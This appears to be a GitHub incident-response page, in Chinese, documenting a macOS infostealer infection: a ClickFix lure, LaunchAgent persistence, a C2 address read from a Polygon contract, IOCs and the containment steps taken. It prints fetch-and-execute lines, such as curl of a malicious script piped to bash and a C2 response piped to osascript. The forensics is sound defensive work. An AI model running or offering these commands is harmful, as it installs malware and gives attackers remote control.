derprofi1313/mac-malware-incident-2026-06-11

GitHub: derprofi1313/mac-malware-incident-2026-06-11

该仓库保存了一起 macOS 恶意软件感染事件的无害化取证证据,包含完整的入侵路径分析、IOC 指标及 SHA-256 完整性校验机制。

Stars: 0 | Forks: 0

# macOS 恶意软件事件 — 2026-06-11 针对 macOS 感染的电子取证(事件响应)。所有文件均已 作无害化处理(`.evidence` / `.removed`)—— **切勿在此执行任何内容。** ## 完整性与安全处理 `SHA256SUMS` 以加密方式绑定了当前的公开证据集。 GitHub-CI 仅检查哈希值、文件模式和符号链接;它 不会执行任何样本,也不会将样本作为构件上传。 ``` node scripts/verify-evidence.mjs ``` 校验器会在 Git 检出中对规范的 Blob 字节进行哈希处理,从而 避免 Windows 换行符转换导致结果出现偏差。在 没有 `.git` 的导出归档中,它会直接检查现有文件。所有 样本均保持 Git 模式 `100644`,带有无害化的后缀,并被 视为具有潜在敌意。有关私密报告 Secrets、 个人数据或重新激活的基础设施的说明,请参阅 [SECURITY.md](SECURITY.md)。 ## 入侵途径 意外执行的命令(社会工程学 / "ClickFix" 骗局): ``` # 请勿执行 — Payload 在 README 中已被故意移除。 bash <<< $(echo "" | base64 -d) # 解码后:curl -s 'https://jawmockssirddos.digital/script.sh' | bash ``` ## 恶意软件类型 macOS Loader / Infostealer: - **持久化:** LaunchAgent `~/Library/LaunchAgents/com.ywywbbsaidgbgfyz.plist` (RunAtLoad + KeepAlive) - **C2 伪装 ("EtherHiding"):** 通过公共 RPC 节点从 Polygon 智能合约中读取当前的 C2 地址 - **主动远程控制 (RCE):** `curl https://hf98x4d.site … | osascript` — 服务器响应会被直接执行 - 混淆:嵌套的 base64 + AppleScript `character id` / `ASCII character` 活跃运行时间大约在 2026-06-11 的 10:23–10:33(当地时间)。 ## 攻陷指标 (IOCs) | 类型 | 值 | |---|---| | 入侵 URL | `https://jawmockssirddos.digital/script.sh` | | C2 Beacon | `https://hf98x4d.site` (`POST txid=…&bmodule`) | | Polygon Dead-Drop 合约 | `0xA3a603F8a454a9c905b4c579Bb72628F7C15C2A0` (data `0x2686ecea`) | | RPC 解析器 | polygon.drpc.org, polygon.publicnode.com, polygon-mainnet.gateway.tatum.io, tenderly.rpc.polygon.community | | 活动 ID (txid) | `91bd211a81f2fbb5020a477c9f729782` | | 持久化 Plist | `com.ywywbbsaidgbgfyz` | | 标记文件 | `~/.txid`, `~/.passphrase` | ## 遏制措施(已执行) - 卸载 LaunchAgent (`launchctl bootout`),终止恶意进程(PID 18805/18808/18820/18822) - 从 `LaunchAgents` 中移除 Plist,转移标记文件 — 所有内容均已在此保全 - 验证完毕:无运行中的恶意进程,Agent 未加载,Shell 配置文件/Cron/LaunchDaemons 干净无异常 ## 文件 | 文件 | 内容 | |---|---| | `script.sh.evidence` | 原始下载的 `script.sh` | | `com.ywywbbsaidgbgfyz.plist.evidence` / `.removed` | 持久化 Plist | | `decoded_agent_applescript.txt` | 解码后的 Agent AppleScript | | `dot_txid.removed` / `dot_passphrase.removed` | 标记文件 | | `process_snapshot.txt` / `launchctl_snapshot.txt` | 感染发生时的进程/launchctl 状态 | ## 发布限制 这些文件仅记录了这起特定事件,并非完整的 恶意软件家族分析。域名、钱包/合约数据以及活动 ID 可能在取证后被修改、停用或重新分配。因此,在投入实际应用前,请通过最新的 Threat-Intelligence 来源对这些 IOC 进行验证。
标签:DAST, DNS 反向解析, MITM代理, 威胁情报, 安全样本, 库, 应急响应, 开发者工具, 恶意软件分析, 数字取证, 网络信息收集, 自动化脚本, 自定义脚本